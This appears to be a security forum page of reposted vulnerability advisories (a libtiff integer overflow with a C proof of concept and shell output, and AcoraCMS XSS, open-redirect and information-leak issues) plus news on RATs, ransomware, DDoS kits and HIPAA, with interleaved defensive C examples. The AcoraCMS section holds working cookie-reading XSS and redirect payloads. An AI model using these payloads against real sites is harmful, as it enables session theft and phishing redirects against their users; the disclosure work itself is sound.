Everything posted by Matt
Description : libtiff versions 3.9.5 and below suffer from an integer overflow vulnerability.
Author : x90c
Source : libtiff 3.9.5 Integer Overflow ≈ Packet Storm
Code :

+----------------------------------------------------+
| XADV-2013001 libtiff <= 3.9.5 integer overflow bug |
+----------------------------------------------------+

vulnerable versions:
- libtiff 3.9.5 <=
- libtiff 3.6.0

not vulnerable versions:
- libtiff 4.0.3
- libtiff 4.0.2
- libtiff 4.0.1
- libtiff 4.0.0

release path: 4.0.3(latest) -> 4.0.2 -> 4.0.1 -> 4.0.0(patched) -> 3.9.5(vulnerable)

testbed: linux distro
type: local
impact: medium
vendor: http://www.remotesensing.org/libtiff
author: x90c
site: x90c.org
email: geinblues@gmail.com

==========
abstract:
==========

I discovered a libtiff TIFFOpen integer overflow bug through weird TIFFOpen call successes with a malformed tif image file!

- tiffcp tool (tiffinfo, tiff2ps, ... can also be used to test):
  Across many tiffcp executions, it often entered the tiffcp function in the tiffcp tool after tiffopen. Calling openSrcImage often succeeds. A malformed tif image with a bad count for SamplesPerPixel or RowsPerStrip can be opened by TIFFOpen even though tiffcp can't TIFFWriteDirectory with the returned TIFF*.

- integer overflow to heap corruption:
  A malformed tif image file with bad SamplesPerPixel and RowsPerStrip can be opened, and the malformed tif data can then be used in calculations in other library functions; this leads to an integer overflow and memory corruption!

- exploitation:
  The exploit tries many times to call TIFFOpen with the malformed tif file. Sometimes, afterwards, the target program that uses the vulnerable libtiff can be corrupted if these two fields pass the validation checks.

=========
details:
=========

tiff-v3.6.0/tools/tiffcp

Many TIFFOpen calls
----
..
[root@centos5 tools]# export SAMPLE=/home/x90c/sample_spp.tif
[root@centos5 tools]# ./tiffcp -b $SAMPLE /home/x90c/sample.tif: Integer overflow in TIFFVStripSize.
TIFFReadDirectory: /home/x90c/sample.tif: cannot handle zero strip size.
[root@centos5 tools]# ./tiffcp -b $SAMPLE /home/x90c/sample.tif: Integer overflow in TIFFVStripSize.
TIFFReadDirectory: /home/x90c/sample.tif: cannot handle zero strip size.
[root@centos5 tools]# ./tiffcp -b $SAMPLE /home/x90c/sample.tif: Integer overflow in TIFFVStripSize.
TIFFReadDirectory: /home/x90c/sample.tif: cannot handle zero strip size.
[root@centos5 tools]# ./tiffcp -b $SAMPLE
samples=1392 imagewidth=2464 rowsperstrip=3248 // debug output
Bias image must be monochrome
[root@centos5 tools]#
----

As you can see, a malformed td_samplesperpixel (the SamplesPerPixel field of the tif image) with a count of 2 changes these values from 1,0 to a sample= value of 1392 (0x570). The invalid value can be used in calculations and integer overflow!

===============
exploit codes:
===============

tiff_poc.c
--
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include "tiffio.h"

int tiff_integer_overflow_test(void)
{
    TIFF* tif = TIFFOpen("/home/x90c/sample_spp.tif", "r");
    /* TIFFTAG_SAMPLESPERPIXEL is a uint16 tag, so read it into a uint16 */
    uint16_t samples = 0;

    /*
     * for instance, the TIFFGetField library function will be
     * called with the malicious samplesperpixel field value:
     * TIFFGetField got a segfault!
     */
    TIFFGetField(tif, TIFFTAG_SAMPLESPERPIXEL, &samples);
    printf("tiff_poc: tif samplesperpixel field=%u\n", samples);
    return 0;
}

int main(void)
{
    return tiff_integer_overflow_test();
}
--

- I attached the sample_spp.tif: http://www.x90c.org/exploits/sample_spp.tif

=============
patch codes:
=============

tiff-4.0.3/tools/tiffcp (latest version)
----
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@centos5 tools]# ./tiffcp $SAMPLE tc1.tif
TIFFFetchNormalTag: Incorrect count for "SamplesPerPixel".
[root@centos5 tools]# ....
..
...
..
----

safe!

==============
vendor status:
==============

2013/08/24 - I discovered the security bug
2013/08/24 - the advisory released
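As an added example (not code from the advisory or from libtiff itself), this is the arithmetic behind the "Integer overflow in TIFFVStripSize" message above, in C: the unchecked strip-size product beside a checked version that rejects wrapped and zero results the way libtiff's own error messages indicate it should. The tag values are the ones the advisory's debug line prints (samples=1392, imagewidth=2464, rowsperstrip=3248); BitsPerSample=8 is an assumption, since the advisory never prints it, and the function names are mine.

```c
/* Added example, not from the advisory: strip-size arithmetic that wraps
 * in 32-bit math, beside a checked version of the same computation.
 * Tag values below come from the advisory's debug output; BitsPerSample=8
 * is assumed. The check mirrors the shape of libtiff's own test, it is
 * not libtiff code. */
#include <stdint.h>
#include <stdio.h>

/* Unchecked: width * spp * (bps/8) * rows in uint32_t arithmetic.
 * Unsigned overflow is defined in C, so this silently wraps modulo 2^32
 * and hands a too-small (possibly zero) buffer size back to the caller. */
uint32_t strip_size_unchecked(uint32_t width, uint16_t spp, uint16_t bps,
                              uint32_t rows)
{
    uint32_t scanline = width * spp * (uint32_t)(bps / 8);
    return scanline * rows;
}

/* Multiply two 32-bit values; return 0 and leave *out untouched if the
 * product would not fit. */
static int mul_u32(uint32_t a, uint32_t b, uint32_t *out)
{
    if (a != 0 && b > UINT32_MAX / a)
        return 0;
    *out = a * b;
    return 1;
}

/* Checked: every partial product is validated before it is used.
 * Returns the strip size, or 0 when the tag values are unusable
 * (overflow, BitsPerSample not a whole byte, or a zero-sized strip,
 * which libtiff also refuses: "cannot handle zero strip size"). */
uint32_t strip_size_checked(uint32_t width, uint16_t spp, uint16_t bps,
                            uint32_t rows)
{
    uint32_t tmp, scanline, total;
    if (bps == 0 || bps % 8 != 0 || spp == 0)
        return 0;
    if (!mul_u32(width, spp, &tmp))
        return 0;
    if (!mul_u32(tmp, bps / 8, &scanline))
        return 0;
    if (!mul_u32(scanline, rows, &total))
        return 0;
    return total;   /* still 0 if width or rows is 0: caller must reject */
}

int main(void)
{
    /* Constructed from the advisory's debug line. */
    uint32_t w = 2464, rows = 3248;
    uint16_t spp = 1392, bps = 8;

    printf("unchecked strip size: %u (wrapped; true value is %llu)\n",
           strip_size_unchecked(w, spp, bps, rows),
           (unsigned long long)w * spp * (bps / 8) * rows);
    printf("checked strip size:   %u (0 = rejected)\n",
           strip_size_checked(w, spp, bps, rows));
    printf("sane 640x8 RGB image: %u\n",
           strip_size_checked(640, 3, 8, 8));
    return 0;
}
```

The wrapped value (2550341632 instead of 11140276224) is exactly what a caller would pass to malloc before reading a strip into it; the checked version returns 0 both for the wrapped case and for a genuinely empty strip, so callers must treat 0 as "reject the file", never as "allocate nothing".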
-
Poison Ivy RAT becoming the AK-47 of cyber-espionage attacks
Matt posted a topic in Stiri securitate
The Poison Ivy Remote Access Tool (RAT) - often considered a tool for novice "script kiddies" - has become a ubiquitous feature of cyber-espionage campaigns, according to experts.

Research by malware protection firm FireEye has revealed that the tool served as the linchpin of many sophisticated cyber attacks, including the compromise of RSA SecurID data in 2011 and the "Nitro" assault against chemical makers, government offices, defence firms and human-rights groups last year. A Peeping Tom webcam sextortionist has been jailed for six years in the US after targeting several young women in attacks that relied on a modified version of Poison Ivy, an incident which shows that the tool has malign uses beyond cyber-espionage.

Poison Ivy remains popular and effective eight years after its original release. FireEye has compiled a list of nation state-type attackers making use of the utility. These include a group called admin@338, which specialises in attacks targeting the financial services industry; th3bug, who have been hammering universities and healthcare facilities since 2009; and menuPass, a group that has run cyber-espionage attacks against defence contractors over the last four years.

Poison Ivy is the preferred RAT of several threat actors located in China. Over recent months other attackers elsewhere in the world have begun adopting the same methodology. A campaign by a Middle East hacking group called "Molerats" (AKA Gaza Hackers Team) switched during June and July to using Poison Ivy to attack Israeli government targets. The latest malware was signed with a fake Microsoft certificate, similar to earlier attacks using the XtremeRat trojan. FireEye has also intercepted Egyptian- and Middle Eastern-themed attacks using decoy content in Arabic whose targets remain uncertain but may include targets in the Palestinian Authority.

"The cyber attacks against Israeli and Palestinian targets that were first documented last year are ongoing," FireEye concludes. "The attackers, which we have called 'Molerats', have also targeted government entities in the UK and in the US. In addition to using XtremeRAT, which is popular among Middle Eastern attackers, we have found that Molerats have adopted the use of Poison Ivy RAT, which is traditionally favoured by Chinese attackers."

"We do not know if this is an intentional attempt by MoleRats to deflect attribution to China-based threat actors, or if they have simply added another, effective, publicly-available RAT to their arsenal. However, this development should raise a warning flag for those who attribute all Poison Ivy attacks to threat actors based in China. The ubiquity of off-the-shelf RATs makes determining positive attribution an increasing challenge," it adds.

More details on the Molerats' cyber-espionage campaign can be found in a blog post, featuring diagrams, screen shots and charts, put together by three FireEye researchers (Nart Villeneuve, Ned Moran and Thoufique Haq).

"You can download the default version of Poison Ivy from poisonivy-rat.com," explained FireEye's Ned Moran. "However, each of these groups is using a custom version of Poison Ivy. We do not believe these specific custom versions are available for sale."

RATs such as Poison Ivy require little technical savvy while offering unfettered access to compromised machines, hence their use by even well-resourced professional cyber-ninja types. They can be considered the easy-to-use front end of attacks that may be quite sophisticated when viewed as a whole.

"They [RATs] are often delivered as a key component of coordinated attacks that use previously unknown (zero-day) software flaws and clever social engineering," explained Darien Kindlund, manager of threat intelligence at FireEye, in a blog post. "Attackers can point and click their way through the target's network to steal data and intellectual property," using tools such as Poison Ivy, he added.

FireEye released a white paper on its research into the hacker tool along with Calamine, a set of free tools to help organisations detect possible Poison Ivy infections.

Source: TheRegister.co.uk
AV-Comparatives.org has published a comprehensive evaluation of security suites for Android. 16 products were evaluated for anti-theft protection, anti-malware protection, battery impact and the features included in each product.

Starting with the impact on battery life, all products did very well (up to 3% consumption), with the exception of Qihoo and Webroot.

Second, a total of 2947 infected applications were scanned; the test was carried out on 23 July 2013. Here is the ranking:

1. AhnLab, Kingsoft – 99.9%
2. Kaspersky – 99.7%
3. Baidu, ESET – 99.6%
4. BitDefender – 99.4%
5. avast! – 99.0%
…….
11. Lookout – 96.0%
12. Trend Micro – 95.6%
13. Qihoo – 93.6%
14. Ikarus – 91.0%

The third and most interesting part is a complete analysis of each tested product, with its advantages and disadvantages.

Most smartphone owners are starting to use them like a PC: documents, web browsing, banking transactions, etc. As a result the dangers become similar: data theft, malware infection, phishing attacks. This makes the use of a robust security solution very important.

For full details of this test, see: AV-Comparatives Mobile-Review
-
Security researchers have discovered a malicious website posing as a legitimate YouTube page that uses social engineering, drive-by downloads and ransomware to lock a visitor's machine in an attempt to extort money from the victim.

The attack site uses porn to lure victims but then combines the attacks, bringing a victim's system to a grinding halt, said Jerome Segura, a senior security researcher at San Jose, Calif.-based Malwarebytes. In his analysis of the activity, Segura said all three stages are classic attacks designed to spread malware, hijack a victim's system and steal account credentials. Combining the attacks is out of the ordinary, he wrote.

"To me, the best attacks are those that are stealth and remain on a system for long periods of time," Segura wrote. "I wonder if the crooks behind this attack were just too greedy or perhaps wanted to test how good the 'conversion rates' would be."

The attack begins when the site prompts a visitor to download and install a phony Flash Player update. Once downloaded, the victim's system is immediately locked up and rebooting is futile, Segura said. A phony porn archive then tricks visitors into downloading fake Windows Media videos that deliver additional malware to the victim's system.

The second stage is an HTML-based ransomware attack, which makes it difficult to shut down the browser. Using malicious JavaScript, an attempt to click away from the page will open a long line of frustrating pop-up messages, Segura said. The attack is similar to previously discovered FBI ransomware campaigns that display a phony violation message from law enforcement, demanding payment of a fine to remove the message.

The final stage is a stealthy infection that exploits an older browser Java plugin vulnerability. The delivered malware attempts to steal data.

Malicious code that attempts to lock up the browser or a victim's system has been a trending attack technique. Attackers had been tricking victims with fake antivirus software, but they have turned to browser-based hijacking because it has worked so well, said Aleks Gostev, chief security expert at Kaspersky Lab. In a recent interview with CRN, Gostev said the vast majority of attacks are being carried out by financially motivated cybercriminals attempting to steal credit card data and account credentials.

"Millions of people can be infected without complex malware," Gostev said. "There is no real need for sophisticated methods because the current methods are working well."

The latest threat report from McAfee also found that ransomware has been increasing. The number of new samples in the second quarter of 2013 was greater than 320,000, more than twice as many as in the previous period, McAfee said. Unlike fake antivirus software, which attempts to collect payment via credit card, ransomware uses anonymous payment services, making it more difficult for law enforcement and security researchers to track down, McAfee said. Citadel and other popular attack toolkits make it even easier to carry out ransomware attacks, the firm said.

Using a combination of attacks is a poor way to carry out a campaign because it makes it easier for antivirus software and network security appliances to detect a suspicious problem, said Malwarebytes' Segura. "This multipronged attack is not representative of what we would normally see in the wild," Segura wrote.

Source: CRN.com
-
Dirt Jumper DDoS Toolkit Gets Security Evasion Functionality
Matt posted a topic in Stiri securitate
An attack toolkit notorious for being a coveted weapon of political hacktivists and other cybercriminals has gained new functionality that could enable it to slip a torrent of malicious packets past DDoS mitigation appliances.

The Dirt Jumper DDoS toolkit, called Drive, now has functionality to test network ports for the use of known techniques that sample traffic for malicious activity, according to Jason Jones, a research analyst at Arbor Networks. In an analysis of Dirt Jumper obtained by CRN that's expected to be released Tuesday, Jones said the latest version "raises the bar for DDoS malware."

Jones, of the Arbor Security Engineering and Response Team, said the latest update to the toolkit is significant. "We expect that this is just the first of many pieces of malware to attempt to incorporate these bypass techniques," Jones wrote in his analysis. "This is one ... the first pieces of DDoS malware that ASERT has seen actively attempt to defeat known mitigation techniques."

The new "Smart Attack" functionality sends out an attack packet that looks for the cookie value or location data set by DDoS mitigation techniques and uses a technique in the next packet it sends to try to slip past the sensors as legitimate traffic. Jones said the attack has been seen in one sample, but he said it would likely become more common.

The attackers built in two other techniques. A "long attack" attempts to keep a network socket open for an extended period to flood as much data as it can into the pipeline. A "byte attack" and an ICMP attack allow for sending smaller payloads. Dirt Jumper Drive also has a strong internal engine that attempts to contact more than a dozen command-and-control servers once a system is infected, according to Jones.

The Dirt Jumper toolkit is believed to originate from Russia. It has been publicly available in underground hacking forums and used since 2009. In previous attacks observed by Arbor Networks, cybercriminals launched DDoS campaigns against a large corporation's load balancer and a Russian electronic trading platform.

Malware authors have been busy making improvements to Dirt Jumper over the years and recently boosted the malware's internal engine and improved how its command-and-control servers respond to analysts trying to probe them, said Richard Henderson, a security strategist at Fortinet's FortiGuard Threat Research and Response Labs. Henderson told CRN that up until now, Dirt Jumper has been easy to detect, but the problem with Dirt Jumper is not preventing a bot from infecting the corporate network, but preventing already infected bots outside the network from attacking online assets.

"I think this is likely the initial or testing stages of a premium DDoS attack kit that will be sold to a very small number of buyers," Henderson said. "We've seen with some premium exploit kits in the past year; there continues to be a very good market out there for people willing to pay incredible amounts of money for tailor-made and exclusive kits."

Dirt Jumper has been seen targeting banks and other financial institutions. A report issued by Dell (NSDQ:Dell) SecureWorks connected the Dirt Jumper attack toolkit to a series of unauthorized wire transfers and noted that it may have drained at least one account of more than $2 million. Attackers are using a technique to test the effectiveness of Dirt Jumper against the bank's IT teams. Security researchers and law enforcement have observed short-lived bursts of traffic from Dirt Jumper and, if effective, a full attack carried out, followed by an unauthorized wire or Automated Clearing House (ACH) transfer out of a compromised account, according to Dell SecureWorks. Attacks have resulted in money being funneled to banks in Russia, Cyprus and China. In these cases, attackers then launder the funds at various locations, including two known locations in Eastern Europe, Dell SecureWorks said.

Source: CRN.com
Bit9 Chief Security Officer Nick Levay has been at the job for only three months, but he told CRN that he already has added staff and is executing against a priority list to bolster security procedures and infrastructure at the whitelisting vendor.

Levay, who joined Waltham, Mass.-based Bit9 in June, served six years at the Center for American Progress, a Washington, D.C., think tank, where he was director of technical operations and information security. Levay said that organization was targeted daily by sophisticated attacks, putting him in a good position to address security operations at Bit9, which suffered a high-profile data breach.

"I have a lot of initiatives and projects under way," Levay told CRN. "There is a mixture of maturing our infrastructure, building out the way our [security operations center] operates and maturing procedures for handling things. It's a lot of stuff."

The whitelisting vendor revealed the data breach in February. The firm provided details about the breach, which began with a SQL injection attack, a common Web-based attack that targets the back-end system that services company websites. The company said once attackers got in, they were able to install a back door and, due to an "operational deficiency," the malware was able to execute because the company's whitelisting software wasn't installed on some systems.

The breach struck at the heart of the company's intellectual property, giving attackers access to digital code-signing certificates. They then used the certificates to target Bit9 customers. In the hands of attackers, the code-signing certificates enabled malware to execute on systems protected by the vendor's whitelisting software. At least three firms were attacked using the stolen certificates before Bit9 revoked them. The company reportedly released details to antivirus vendors regarding more than two dozen malware types created using the stolen certificates.

Levay declined to discuss specifics but said much of the work he is overseeing was prompted by the data breach. "I'm really building out best practices in how we run our [security operations center] and we handle our operations," he said.

"Before I even got here, a lot of very good actions were taken in the wake of the breach to ensure that the types of deficiencies that led to the breach would not occur again," Levay said. "There is a degree of which that I have been taking what has already been started, maturing it and taking the additional steps."

Levay promises to talk at length publicly about his work at Bit9 "farther down the road." Until then, he said he was hiring additional security staff and streamlining some processes to gain control and oversight over operations.

"The security within Bit9 is something that is taken very seriously across the board coming from the executive management level all the way down," Levay said. "We are really maturing how we approach everything and taking a fresh look at how we approach everything."

Levay said his work at the Center for American Progress involved addressing an environment under constant attack. User awareness training was critical because employees in various roles, from workers in the national security group to researchers on foreign policy, climate or trade, were likely to be targeted by spear-phishing attacks, particularly from state actors, Levay said.

"We were under constant attack and onslaught," Levay said. "Not a week went by where there wasn't another attack that we were monitoring."

In 2009 the Center for American Progress reported that it suffered a data breach following a sophisticated attack on its systems. In a breach notification letter (.PDF) sent to the Maryland Attorney General's office, the organization said the names and Social Security numbers of current and former employees were exposed. The attackers impacted both the Center for American Progress and its Action Fund.

Levay said he was lucky enough to find two or three respected people within the organization who took security seriously and within a year, a strong security culture had been instilled within the organization. If employees had any doubt about the validity of email content, they would send it to the IT staff for analysis.

"If you are lucky enough to get one of those situations that's the kind of thing that can push an awareness program over the line," Levay said. "You have to find champions within the organization."

Source: CRN.com
-
Organizations handling healthcare data have a month to comply with new security and privacy requirements under the Health Information Technology for Economic and Clinical Health (HITECH) Act.

After Sept. 23, all covered entities, including online storage vendors and cloud service providers, will be subject to new breach notification standards and limitations on how they can use and disclose PHI. They will also be required to ensure that their business associates and subcontractors are compliant with the privacy and security requirements of the Health Insurance Portability and Accountability Act (HIPAA). The HITECH Act amended portions of HIPAA by adding new security and privacy provisions on patient information.

In addition, covered entities will be required to have updated patient privacy notices in place that state the patient's rights over the data and how the data can be used and shared.

Unlike the original HIPAA privacy and security rules, which primarily applied to healthcare organizations and insurance companies, the new HIPAA Omnibus rules apply to business associates and their subcontractors. Under the omnibus rules, a business associate of a healthcare provider, such as a cloud service provider, is directly liable for protecting any patient data it handles, even if the vendor is just storing the data. Business associates are also liable for ensuring that any subcontractor they hire, such as a document-shredding company, is similarly protecting PHI.

The new rules for safeguarding PHI create a complex liability chain, said Peter MacKoul, president of consulting firm HIPAA Solutions LC. A covered entity or a business associate could face stiff civil penalties for a breach by a subcontractor, regardless of how far down the chain the subcontractor might be, he said.

Under the Omnibus HIPAA rules, covered entities and business associates are directly responsible for protecting against the use of PHI by employees, contract workers, trainees and even unpaid volunteers and interns, MacKoul noted.

The rules also give healthcare organizations and business associates less latitude to determine when to make a breach notification, he said. Previously, a healthcare organization needed to notify individuals of a data breach only if there was a serious risk of financial or reputational harm. Under the new requirements, covered entities and business associates will be required to issue a breach notification in most cases, unless they can specifically show there is a "low probability" of the breached data being misused, MacKoul said. Healthcare companies will be required to consider four specific factors, including the nature of the data that was breached and whether PHI was acquired or only viewed, to determine the seriousness of a breach. Importantly, breach notification requirements can be triggered even if an employee, contractor or unpaid volunteer uses PHI in an impermissible manner, he said.

Healthcare entities need to identify all their business associates, especially newly covered entities such as data storage companies, and ensure they have proper business associate agreements with them by Sept. 23, said William Maruca, a partner with Fox Rothschild LLP.

Healthcare companies also must have updated patient privacy notices in place by the deadline, Maruca said. The notice must specifically state that the covered entity is required to obtain the patient's authorization to use or sell his or her information for marketing or other purposes and to use or disclose psychotherapy notes, Maruca said. Privacy notices will also need to include a description of how an individual can revoke an authorization and explain their right to receive a notification in the event of a data breach, Maruca said.

"I think the readiness level varies considerably," Maruca noted. "Larger health systems and similar organizations with dedicated health privacy officers may be ahead of the curve, and some savvy smaller entities have been very proactive," he said. But "others are dragging their feet. I think it may take a high-profile enforcement ... to get the attention of the smaller players."

Deborah Peel, founder and chairman of the advocacy group Patient Privacy Rights, noted that while the changes are designed to improve patient privacy, several loopholes remain. Despite the changes, most health data can still be sold, she said. There is also no chain of custody for health data despite the generally strong security and contract requirements for business associates and subcontractors, Peel said.

As a result there is no way for patients "to obtain a complete map or picture of who used your health information or why. Without a complete data map that tracks all flows of data, we have no idea about the harms and misuses, making it impossible to weigh the risks vs. benefits of using" health information technology systems, she noted.

Source: ComputerWorld.com
-
Description : CM3 AcoraCMS versions 6.0.6/1a, 6.0.2/1a, 5.5.7/12b, and 5.5.0/1b-p1 suffer from cross site request forgery, cross site scripting, information disclosure, weak cookies, and URL redirection vulnerabilities.
Author : Pedro Andujar
Source : CM3 AcoraCMS XSS / CSRF / Redirection / Disclosure ≈ Packet Storm
Code :

===============================
- Advisory -
===============================

Title: CM3 AcoraCMS - Several Vulnerabilities
Risk: Medium
Date: 12.Sept.2012
Author: Pedro Andujar
Twitter: @pandujar

.: [ INTRO ] :.

Acora CMS is a sleek and powerful off-the-shelf content management application coupled with a deep and extensible advanced website development framework at a killer price. This home-grown product is one of DDSN's key differentiators. It's in use by many high-profile clients, but easily scales down for smaller websites too.

AcoraCMS is widely used across Australian IT companies, banks and government websites.

.: [ TECHNICAL DESCRIPTION ] :.

AcoraCMS v6.0.6/1a, v6.0.2/1a, v5.5.7/12b, v5.5.0/1b-p1 (and probably others) are prone to several security issues, as described below.

.: [ ISSUE #1 ] :.

Name: Reflected Cross Site Scripting
Severity: Medium
CVE: CVE-2013-4722

Due to a lack of input validation and output escaping in the default.asp page, parameters such as username, url, qstr, etc. can be used by an attacker to perform XSS attacks.

Example:
/AcoraCMS/Admin/login/default.asp?username="</div><script>alert(document.cookie)</script>
/AcoraCMS/Admin/login/default.asp?url="</form><META HTTP-EQUIV=Refresh CONTENT="0; URL=http://www.google.es">

.: [ ISSUE #2 ] :.

Name: URL Redirect
Severity: Medium
CVE: CVE-2013-4723

The URL redirection functionality doesn't verify that VirtualPath values are relative.

Example:
/AcoraCMS/track.aspx?m=1&l=//www.google.es

.: [ ISSUE #3 ] :.

Name: Username and password sent in clear text
Severity: Medium

Authentication credentials (username and password) and session cookies are sent unencrypted.

.: [ ISSUE #4 ] :.

Name: Cookie Lack of Hardening
Severity: Low
CVE: CVE-2013-4724 & CVE-2013-4725

Cookies are not hardened using the HttpOnly or Secure flags.

.: [ ISSUE #5 ] :.

Name: XSRF
Severity: Low
CVE: CVE-2013-4726

The application lacks controls to prevent Cross Site Request Forgery.

.: [ ISSUE #6 ] :.

Name: Information Leaks
Severity: Low
CVE: CVE-2013-4727 & CVE-2013-4728

* Unauthenticated users are able to retrieve the base64-encoded __VIEWSTATE information.

/AcoraCMS/Admin/top.aspx

<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTQ4NjIxMDUxOQ9kFgJmD2QWAgIDD2QWAgIBD2QWCmYPFgIeBFRleHQFJERpZ2l0YWxTZWMgTmV0d29ya3MgV2Vic2l0ZWQCAQ8WAh8ABQpFbnRlcnByaXNlZAICDw8WAh8ABQt2NS40LjUvNGEtY2RkAgMPFgIfAAUgQW5vbnltb3VzIChQdWJsaWMgSW50ZXJuZXQgVXNlcilkAgQPDxYCHgdWaXNpYmxlaGRkZIL9u8OSlqqnBHGwtssOBV5lciAoCg" />
</div>

Once decoded, it gives you information about the version and license, including the company that owns the license; it could be used for fingerprinting the application:

-486210519 d f d d d f Text $DigitalSec Networks Websited Enterprised v5.4.5/4a-cdd Anonymous (Public Internet User)d VisiblehdddÒq ^er (

* Application physical path exposed to unauthenticated users

/AcoraCMS/track.aspx?m=1&l=..\..

Exception Details: System.Web.HttpException: Cannot use a leading .. to exit above the top directory.
Source File: d:\Path\to\site\AcoraCMS\track.aspx.cs Line: 57

.: [ CHANGELOG ] :.

* 12/Sep/2012: - Vulnerability discovered.
* 27/May/2013: - Vendor contacted. No response
* 19/Aug/2013: - Vendor recontacted. No response
* 26/Aug/2013: - Public

.: [ SOLUTIONS ] :.

N/A

.: [ REFERENCES ] :.

[+] Acora CMS http://www.ddsn.com/knowledge-base/cm3-acora-cms.aspx
[+] Clients & Projects http://www.ddsn.com/portfolio/clients.aspx
[+] CM3CMS http://www.cm3cms.com/
[+] !dSR - Digital Security Research http://www.digitalsec.net/
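As an added example (not code from the advisory, from AcoraCMS or from ASP.NET), here is the fingerprinting step from ISSUE #6 carried out in C: the __VIEWSTATE value quoted above is base64-decoded and its printable runs extracted, which is enough to recover the license holder and version string without parsing the ASP.NET serialisation format. ASP.NET ViewState is only base64-encoded unless the application turns on ViewState encryption; a ViewState MAC, where present, protects integrity, not confidentiality. The blob is copied verbatim from the advisory (the page dropped its '=' padding, so the decoder tolerates that); the decoder, the minimum run length of 4 and the helper names are mine.

```c
/* Added example, not from the advisory: decode the __VIEWSTATE value
 * quoted in ISSUE #6 and list the printable strings it contains.
 * The blob is the one from /AcoraCMS/Admin/top.aspx as shown above;
 * the decoder and helpers are illustrative code. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static const char VIEWSTATE[] =
    "/wEPDwUKLTQ4NjIxMDUxOQ9kFgJmD2QWAgIDD2QWAgIBD2QWCmYPFgIeBFRleHQFJERp"
    "Z2l0YWxTZWMgTmV0d29ya3MgV2Vic2l0ZWQCAQ8WAh8ABQpFbnRlcnByaXNlZAICDw8W"
    "Ah8ABQt2NS40LjUvNGEtY2RkAgMPFgIfAAUgQW5vbnltb3VzIChQdWJsaWMgSW50ZXJu"
    "ZXQgVXNlcilkAgQPDxYCHgdWaXNpYmxlaGRkZIL9u8OSlqqnBHGwtssOBV5lciAoCg";

static int b64val(int c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;                    /* '=' padding or junk: stop decoding */
}

/* Minimal base64 decoder that does not insist on '=' padding.
 * Returns the number of decoded bytes (counted even beyond cap). */
size_t b64_decode(const char *in, unsigned char *out, size_t cap)
{
    uint32_t acc = 0;
    int bits = 0;
    size_t n = 0;
    for (; *in; in++) {
        int v = b64val((unsigned char)*in);
        if (v < 0) break;
        acc = (acc << 6) | (uint32_t)v;
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (n < cap) out[n] = (unsigned char)(acc >> bits);
            n++;
        }
    }
    return n;
}

#define IS_PRINT(c) ((c) >= 0x20 && (c) <= 0x7e)

/* Walk the decoded bytes and visit every printable run of at least minlen
 * bytes (surrounding spaces trimmed). With needle == NULL the runs are
 * printed and counted; otherwise returns 1 as soon as a run equals needle. */
static int scan_runs(const unsigned char *buf, size_t n, size_t minlen,
                     const char *needle)
{
    int count = 0;
    size_t i = 0;
    while (i < n) {
        if (!IS_PRINT(buf[i])) { i++; continue; }
        size_t start = i;
        while (i < n && IS_PRINT(buf[i])) i++;
        size_t end = i;
        while (start < end && buf[start] == ' ') start++;
        while (end > start && buf[end - 1] == ' ') end--;
        size_t len = end - start;
        if (len < minlen) continue;
        if (needle == NULL) {
            printf("  %.*s\n", (int)len, (const char *)buf + start);
            count++;
        } else if (len == strlen(needle) &&
                   memcmp(buf + start, needle, len) == 0) {
            return 1;
        }
    }
    return needle ? 0 : count;
}

/* Size of the decoded blob (202 bytes for the value above). */
size_t viewstate_decoded_len(void)
{
    unsigned char buf[512];
    return b64_decode(VIEWSTATE, buf, sizeof buf);
}

/* 1 if needle occurs as a whole printable run in the decoded ViewState. */
int viewstate_has_string(const char *needle)
{
    unsigned char buf[512];
    size_t n = b64_decode(VIEWSTATE, buf, sizeof buf);
    return scan_runs(buf, n, 4, needle);
}

int main(void)
{
    unsigned char buf[512];
    size_t n = b64_decode(VIEWSTATE, buf, sizeof buf);
    printf("decoded %zu bytes; printable runs:\n", n);
    scan_runs(buf, n, 4, NULL);
    return 0;
}
```

The runs that come out ("$DigitalSec Networks Websited", "Enterprised", "v5.4.5/4a-cdd", "Anonymous (Public Internet User)d") are the same fragments the advisory lists, with the trailing 'd' bytes being serialisation markers rather than part of the strings. The 21 non-printable bytes at the end are consistent with a ViewState MAC, which is why decoding still works: the MAC stops tampering, not reading.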
-
Description : Cisco IronPort Security Management Appliance M170 version 7.9.1-030 suffers from cross site scripting and cross site request forgery vulnerabilities.
Author : Pedro Andujar
Source : Cisco Ironport Cross Site Request Forgery / Cross Site Scripting ≈ Packet Storm
Code :

===============================
- Advisory -
===============================

Title: Cisco IronPort Security Management Appliance - Multiple issues
Risk: Medium
Date: 20.May.2013
Author: Pedro Andujar
Twitter: @pandujar

.: [ INTRO ] :.

The Cisco Security Management Appliance helps to enable flexible management and comprehensive security control at the network gateway. It is a central platform for managing all policy, reporting, and auditing information for Cisco web and email security appliances.

.: [ TECHNICAL DESCRIPTION ] :.

Cisco IronPort Security Management Appliance M170 v7.9.1-030 (and probably other products) is prone to several security issues, as described below.

.: [ ISSUE #1 ] :.

Name: Reflected Cross Site Scripting
Severity: Low
CVE: CVE-2013-3396

There is a lack of output escaping in the default error 500 page. When an exception occurs in the application, the error description contains unvalidated user input from the request:

** PoC removed as requested by Cisco. **

.: [ ISSUE #2 ] :.

